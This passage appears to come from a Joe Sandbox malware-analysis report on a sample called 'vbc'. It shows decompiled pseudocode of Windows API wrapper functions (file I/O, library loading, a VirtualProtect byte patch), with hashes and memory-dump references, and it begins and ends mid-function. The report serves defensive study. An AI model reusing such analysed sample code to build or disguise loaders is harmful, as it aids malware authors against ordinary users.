				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
				}
				_t5 = E0040689A(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00406912
0x00406915
0x0040691c
0x00406924
0x00406930
0x00000000
0x00406937
0x00406927
0x0040692e
0x00000000
0x0040693f
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
GetProcAddress.KERNEL32(00000000,?), ref: 00406937

Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
Part of subcall function 0040689A: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E

Uniqueness

Uniqueness Score: -1.00%

Function 0040602D Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040602D(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00406031
0x0040603e
0x00406053
0x00406059

APIs

GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406053

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15

Uniqueness

Uniqueness Score: -1.00%

Function 00406008 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406008(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}

0x0040600d
0x00406013
0x00406018
0x00406021
0x00406021
0x0040602a

APIs

GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
SetFileAttributesW.KERNEL32(?,00000000), ref: 00406021

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405AEB Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405AEB(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405af1
0x00405af9
0x00000000
0x00405aff
0x00000000

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
GetLastError.KERNEL32 ref: 00405AFF

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D

Uniqueness

Uniqueness Score: -1.00%

Function 004060DF Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060DF(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x004060e3
0x004060f3
0x004060fb
0x00000000
0x00406102
0x00000000
0x00406104

APIs

WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 004060F3

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4

Uniqueness

Uniqueness Score: -1.00%

Function 004060B0 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060B0(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x004060b4
0x004060c4
0x004060cc
0x00000000
0x004060d3
0x00000000
0x004060d5

APIs

ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000), ref: 004060C4

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4

Uniqueness

Uniqueness Score: -1.00%

Function 73282A7F Relevance: 1.5, APIs: 1, Instructions: 21
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x73285048 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x7328505c, 4, 0x40, 0x7328504c); // executed
					 *0x7328505c = 0xc2;
					 *0x7328504c = 0;
					 *0x73285054 = 0;
					 *0x73285068 = 0;
					 *0x73285058 = 0;
					 *0x73285050 = 0;
					 *0x73285060 = 0;
					 *0x7328505e = 0;
				}
				return 1;
			}

0x73282a88
0x73282a8d
0x73282a9d
0x73282aa5
0x73282aac
0x73282ab1
0x73282ab6
0x73282abb
0x73282ac0
0x73282ac5
0x73282aca
0x73282aca
0x73282ad2

APIs

VirtualProtect.KERNELBASE(7328505C,00000004,00000040,7328504C), ref: 73282A9D

Memory Dump Source

Source File: 00000009.00000002.722913626.0000000073281000.00000020.00000001.01000000.00000004.sdmp, Offset: 73280000, based on PE: true

Associated: 00000009.00000002.722901717.0000000073280000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.722939825.0000000073284000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.722947781.0000000073286000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73280000_vbc.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 18192501db64f714e11d7cd9f9cd8ca328576567b7c94787a1122f2bb2438a4f
Instruction ID: 3419202e1bdb5233734e8f4527527fd308e964ab3c7eae402c6495640f95c01a
Opcode Fuzzy Hash: 18192501db64f714e11d7cd9f9cd8ca328576567b7c94787a1122f2bb2438a4f
Instruction Fuzzy Hash: E4F0A5F2504380DEC350EF2A84487893FE0B70C308B34C52AE19CEA281E3344084FF92

Uniqueness

Uniqueness Score: -1.00%

Function 004044E5 Relevance: 1.5, APIs: 1, Instructions: 9
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044E5(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x433ed8;
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}

0x004044e5
0x004044ec
0x004044f7
0x00000000
0x004044f7
0x004044fd

APIs

SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
Instruction ID: 729772cd993a62bf3dcd5a53f5ba0c6067f9c4589e443fe2cdcdd0dddf41cb53
Opcode Fuzzy Hash: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
Instruction Fuzzy Hash: 74C04CB1740605BADA108B509D45F0677546750701F188429B641A50E0CA74E410D62C

Uniqueness

Uniqueness Score: -1.00%

Function 004044CE Relevance: 1.5, APIs: 1, Instructions: 6
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044CE(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x434f08, 0x28, _a4, 1); // executed
				return _t2;
			}

0x004044dc
0x004044e2

APIs

SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
Instruction ID: f9270ce27bc2d5d500308faa7c43699bdd9cec228278350af1c7ef3a72e6c056
Opcode Fuzzy Hash: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
Instruction Fuzzy Hash: 4FB01235181A00FBDE514B00DE09F857E62F7E4701F058038F341240F0CBB200A4DB08

Uniqueness

Uniqueness Score: -1.00%

Function 004034E5 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004034E5(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x004034f3
0x004034f9

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 004044BB Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044BB(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x42d264, _a4); // executed
				return _t2;
			}

0x004044c5
0x004044cb

APIs

KiUserCallbackDispatcher.NTDLL(?,00404292), ref: 004044C5

Memory Dump Source

Source File: 00000009.00000002.722207746.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.722202537.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722213035.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722216855.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722228852.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722232496.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722288315.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.722296361.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vbc.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
Instruction ID: 0db23a64e3c973129ccb7351ad80e5cfa0365495cc8a336c35755b545d17f2be
Opcode Fuzzy Hash: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
Instruction Fuzzy Hash: 74A00275508601DBDE115B51DF09D057B71A7547017414579A18551034C6314461EB5D

Uniqueness

Uniqueness Score: -1.00%

Function 73282B98 Relevance: 1.4, APIs: 1, Instructions: 143
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E73282B98(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t28;
				void* _t29;
				int _t33;
				void* _t37;
				void* _t40;
				void* _t45;
				void* _t49;
				signed int _t56;
				void* _t61;
				void* _t70;
				intOrPtr _t72;
				signed int _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t81;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				intOrPtr _t93;
				intOrPtr _t94;

				if( *0x73285050 != 0 && E73282ADB(_a4) == 0) {
					 *0x73285054 = _t93;
					if( *0x7328504c != 0) {
						_t93 =  *0x7328504c;
					} else {
						E732830C0(E73282AD5(), __ecx);
						 *0x7328504c = _t93;
					}
				}
				_t28 = E73282B09(_a4);
				_t94 = _t93 + 4;
				if(_t28 <= 0) {
					L9:
					_t29 = E73282AFD();
					_t72 = _a4;
					_t79 =  *0x73285058;
					 *((intOrPtr*)(_t29 + _t72)) = _t79;
					 *0x73285058 = _t72;
					E73282AF7();
					_t33 = CloseHandle(??); // executed
					 *0x73285034 = _t33;
					 *0x73285038 = _t79;
					if( *0x73285050 != 0 && E73282ADB( *0x73285058) == 0) {
						 *0x7328504c = _t94;
						_t94 =  *0x73285054;
					}
					_t80 =  *0x73285058;
					_a4 = _t80;
					 *0x73285058 =  *((intOrPtr*)(E73282AFD() + _t80));
					_t37 = E73282AE9(_t80);
					_pop(_t81);
					if(_t37 != 0) {
						_t40 = E73282B09(_t81);
						if(_t40 > 0) {
							_push(_t40);
							_push(E73282B14() + _a4 + _v8);
							_push(E73282B1E());
							if( *0x73285050 <= 0 || E73282ADB(_a4) != 0) {
								_pop(_t88);
								_pop(_t45);
								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
								if(__eflags == 0) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t89);
								_pop(_t49);
								 *0x7328504c =  *0x7328504c +  *(_t89 + _t49) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					_t107 =  *0x73285058;
					if( *0x73285058 == 0) {
						 *0x7328504c = 0;
					}
					E73282B42(_t107, _a4,  *0x73285034,  *0x73285038);
					return _a4;
				}
				_push(E73282B14() + _a4);
				_t56 = E73282B1A();
				_v8 = _t56;
				_t77 = _t28;
				_push(_t68 + _t56 * _t77);
				_t70 = E73282B26();
				_t87 = E73282B22();
				_t90 = E73282B1E();
				_t61 = _t77;
				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
					_push( *((intOrPtr*)(_t70 + _t61)));
				}
				_push( *((intOrPtr*)(_t87 + _t61)));
				asm("loop 0xfffffff1");
				goto L9;
			}

0x73282ba8
0x73282bb9
0x73282bc6
0x73282bda
0x73282bc8
0x73282bcd
0x73282bd2
0x73282bd2
0x73282bc6
0x73282be3
0x73282be8
0x73282bee
0x73282c32
0x73282c32
0x73282c37
0x73282c3c
0x73282c42
0x73282c44
0x73282c4a
0x73282c57
0x73282c59
0x73282c5e
0x73282c6b
0x73282c7e
0x73282c84
0x73282c8a
0x73282c8b
0x73282c91
0x73282c9d
0x73282ca3
0x73282cab
0x73282cac
0x73282caf
0x73282cba
0x73282cbc
0x73282cc8
0x73282cce
0x73282cd6
0x73282d02
0x73282d03
0x73282d05
0x73282d09
0x73282d09
0x73282d10
0x73282ce6
0x73282ce6
0x73282ce7
0x73282cf5
0x73282cfe
0x73282cfe
0x73282cd6
0x73282cba
0x73282d12
0x73282d19
0x73282d1b
0x73282d1b
0x73282d34
0x73282d42
0x73282d42
0x73282bf9
0x73282bfa
0x73282bff
0x73282c03
0x73282c08
0x73282c1c
0x73282c1d
0x73282c1e
0x73282c20
0x73282c25
0x73282c27
0x73282c27
0x73282c2a
0x73282c30
0x00000000

APIs

CloseHandle.KERNELBASE(00000000), ref: 73282C57

Memory Dump Source

Source File: 00000009.00000002.722913626.0000000073281000.00000020.00000001.01000000.00000004.sdmp, Offset: 73280000, based on PE: true

Associated: 00000009.00000002.722901717.0000000073280000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.722939825.0000000073284000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.722947781.0000000073286000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73280000_vbc.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 1ef657144265ada7ba89caecc7987b40626885b2f78e7071c69b6852bb5133c2
Instruction ID: 59cb301e01e44a24428ca593fe932c69135fc46e8443f646d0e4f4e4cf57d30a
Opcode Fuzzy Hash: 1ef657144265ada7ba89caecc7987b40626885b2f78e7071c69b6852bb5133c2
Instruction Fuzzy Hash: B54190B250030DDFEB11EF69D988BD97BB9EB48314F34C426E409D61C0D67994C0AB91

Uniqueness

Uniqueness Score: -1.00%

Function 732812BB Relevance: 1.3, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E732812BB() {
				void* _t3;

				_t3 = GlobalAlloc(0x40,  *0x7328506c +  *0x7328506c); // executed
				return _t3;
			}

0x732812c5
0x732812cb

APIs

GlobalAlloc.KERNELBASE(00000040,?,732812DB,?,7328137F,00000019,732811CA,-000000A0), ref: 732812C5

Memory Dump Source

Source File: 00000009.00000002.722913626.0000000073281000.00000020.00000001.01000000.00000004.sdmp, Offset: 73280000, based on PE: true

Associated: 00000009.00000002.722901717.0000000073280000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.722939825.0000000073284000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.722947781.0000000073286000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_73280000_vbc.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 6fcd43f00682317228415e08771684b88c5ae402de62d51412d9cbaff8acb8b9
Instruction ID: f478329390f1e9c3e9af267b28f4bb7edd30c35185d8bed6e2e48c0aa9cfcfd0
Opcode Fuzzy Hash: 6fcd43f00682317228415e08771684b88c5ae402de62d51412d9cbaff8acb8b9
Instruction Fuzzy Hash: 00B012B2A00120DFEE00AB65CC0EF7536D4E704301F24C000FA08C0181C12048009536

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040498A Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 275
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040498A(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x42c240; // 0x2916a4
				_v32 = _t82;
				_t2 = _t82 + 0x3c; // 0x0
				_t3 = _t82 + 0x38; // 0x0
